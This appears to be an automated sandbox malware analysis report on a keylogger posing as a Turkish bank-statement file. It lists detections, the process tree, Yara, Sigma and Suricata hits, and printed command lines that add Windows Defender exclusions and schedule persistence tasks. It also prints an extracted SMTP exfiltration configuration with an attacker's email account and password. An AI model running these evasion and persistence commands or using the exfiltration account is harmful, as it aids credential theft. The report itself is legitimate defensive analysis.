Edit tour

Windows Analysis Report
Hesap_Hareketleri_09122024_html.exe

Overview

General Information

Sample name:	Hesap_Hareketleri_09122024_html.exe
Analysis ID:	1572373
MD5:	a1d6c4ee5e1bf8e8e8e335e25e3cb4ef
SHA1:	d55f64167243a1211ad7b3f51174c70f2d3d1c3d
SHA256:	0b0e33a49e209932b6fa85be230050e28ed46e35129a3b4b0b6f782ac4849f21
Tags:	exegeoMassLoggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Hesap_Hareketleri_09122024_html.exe (PID: 6852 cmdline: "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe" MD5: A1D6C4EE5E1BF8E8E8E335E25E3CB4EF)

powershell.exe (PID: 4828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 64 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EfgRyiVrT.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 4200 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 2304 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp211D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Hesap_Hareketleri_09122024_html.exe (PID: 6256 cmdline: "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe" MD5: A1D6C4EE5E1BF8E8E8E335E25E3CB4EF)

EfgRyiVrT.exe (PID: 6272 cmdline: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe MD5: A1D6C4EE5E1BF8E8E8E335E25E3CB4EF)

schtasks.exe (PID: 4600 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp335D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

EfgRyiVrT.exe (PID: 760 cmdline: "C:\Users\user\AppData\Roaming\EfgRyiVrT.exe" MD5: A1D6C4EE5E1BF8E8E8E335E25E3CB4EF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xaa0:$a1: get_encryptedPassword 0x1028:$a2: get_encryptedUsername 0x713:$a3: get_timePasswordChanged 0x82a:$a4: get_passwordField 0xab6:$a5: set_encryptedPassword 0x37d2:$a6: get_passwords 0x3b66:$a7: get_logins 0x37be:$a8: GetOutlookPasswords 0x3177:$a9: StartKeylogger 0x3abf:$a10: KeyLoggerEventArgs 0x3217:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.4791309433.000000000043D000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x182a60:$a1: get_encryptedPassword 0x1c5a80:$a1: get_encryptedPassword 0x2088a0:$a1: get_encryptedPassword 0x182fe8:$a2: get_encryptedUsername 0x1c6008:$a2: get_encryptedUsername 0x208e28:$a2: get_encryptedUsername 0x1826d3:$a3: get_timePasswordChanged 0x1c56f3:$a3: get_timePasswordChanged 0x208513:$a3: get_timePasswordChanged 0x1827ea:$a4: get_passwordField 0x1c580a:$a4: get_passwordField 0x20862a:$a4: get_passwordField 0x182a76:$a5: set_encryptedPassword 0x1c5a96:$a5: set_encryptedPassword 0x2088b6:$a5: set_encryptedPassword 0x185792:$a6: get_passwords 0x1c87b2:$a6: get_passwords 0x20b5d2:$a6: get_passwords 0x185b26:$a7: get_logins 0x1c8b46:$a7: get_logins 0x20b966:$a7: get_logins
Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6852	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6852	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6852	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6852	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6852	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x84f9b:$a1: get_encryptedPassword 0x85416:$a2: get_encryptedUsername 0x84c3d:$a3: get_timePasswordChanged 0x84d3b:$a4: get_passwordField 0x84fb1:$a5: set_encryptedPassword 0x876f8:$a6: get_passwords 0x879cf:$a7: get_logins 0x876e4:$a8: GetOutlookPasswords 0x8713e:$a9: StartKeylogger 0x8793d:$a10: KeyLoggerEventArgs 0x871de:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6256	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6256	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6256	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6256	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5929f:$a1: get_encryptedPassword 0x5981d:$a2: get_encryptedUsername 0x58f21:$a3: get_timePasswordChanged 0x59038:$a4: get_passwordField 0x592b5:$a5: set_encryptedPassword 0x5bf79:$a6: get_passwords 0x5c309:$a7: get_logins 0x5bf65:$a8: GetOutlookPasswords 0x5b91e:$a9: StartKeylogger 0x5c262:$a10: KeyLoggerEventArgs 0x5b9be:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: EfgRyiVrT.exe PID: 6272	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: EfgRyiVrT.exe PID: 760	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: EfgRyiVrT.exe PID: 760	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e0ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d751:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x7d9ae:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data 0x7e38d:$a5: \Kometa\User Data\Default\Login Data
1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb50c0:$a1: get_encryptedPassword 0xf80e0:$a1: get_encryptedPassword 0x13af00:$a1: get_encryptedPassword 0xb5648:$a2: get_encryptedUsername 0xf8668:$a2: get_encryptedUsername 0x13b488:$a2: get_encryptedUsername 0xb4d33:$a3: get_timePasswordChanged 0xf7d53:$a3: get_timePasswordChanged 0x13ab73:$a3: get_timePasswordChanged 0xb4e4a:$a4: get_passwordField 0xf7e6a:$a4: get_passwordField 0x13ac8a:$a4: get_passwordField 0xb50d6:$a5: set_encryptedPassword 0xf80f6:$a5: set_encryptedPassword 0x13af16:$a5: set_encryptedPassword 0xb7df2:$a6: get_passwords 0xfae12:$a6: get_passwords 0x13dc32:$a6: get_passwords 0xb8186:$a7: get_logins 0xfb1a6:$a7: get_logins 0x13dfc6:$a7: get_logins
1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb6484:$s1: UnHook 0xf94a4:$s1: UnHook 0x13c2c4:$s1: UnHook 0xb648b:$s2: SetHook 0xf94ab:$s2: SetHook 0x13c2cb:$s2: SetHook 0xb6493:$s3: CallNextHook 0xf94b3:$s3: CallNextHook 0x13c2d3:$s3: CallNextHook 0xb64a0:$s4: _hook 0xf94c0:$s4: _hook 0x13c2e0:$s4: _hook
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe", ParentImage: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe, ParentProcessId: 6852, ParentProcessName: Hesap_Hareketleri_09122024_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe", ProcessId: 4828, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp335D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp335D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe, ParentImage: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe, ParentProcessId: 6272, ParentProcessName: EfgRyiVrT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp335D.tmp", ProcessId: 4600, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp211D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp211D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe", ParentImage: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe, ParentProcessId: 6852, ParentProcessName: Hesap_Hareketleri_09122024_html.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp211D.tmp", ProcessId: 2304, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe", ParentImage: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe, ParentProcessId: 6852, ParentProcessName: Hesap_Hareketleri_09122024_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe", ProcessId: 4828, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp211D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp211D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe", ParentImage: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe, ParentProcessId: 6852, ParentProcessName: Hesap_Hareketleri_09122024_html.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp211D.tmp", ProcessId: 2304, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T14:07:37.770864+0100	2803305	3	Unknown Traffic	192.168.2.6	49721	172.67.177.134	443	TCP
2024-12-10T14:07:41.466474+0100	2803305	3	Unknown Traffic	192.168.2.6	49726	172.67.177.134	443	TCP
2024-12-10T14:07:47.685667+0100	2803305	3	Unknown Traffic	192.168.2.6	49739	172.67.177.134	443	TCP
2024-12-10T14:07:50.782182+0100	2803305	3	Unknown Traffic	192.168.2.6	49745	172.67.177.134	443	TCP
2024-12-10T14:07:53.875936+0100	2803305	3	Unknown Traffic	192.168.2.6	49749	172.67.177.134	443	TCP
2024-12-10T14:07:57.009310+0100	2803305	3	Unknown Traffic	192.168.2.6	49754	172.67.177.134	443	TCP
2024-12-10T14:08:03.215951+0100	2803305	3	Unknown Traffic	192.168.2.6	49761	172.67.177.134	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T14:07:33.780912+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49717	132.226.247.73	80	TCP
2024-12-10T14:07:36.296445+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49717	132.226.247.73	80	TCP
2024-12-10T14:07:37.656640+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49720	132.226.247.73	80	TCP
2024-12-10T14:07:39.327680+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49724	132.226.247.73	80	TCP
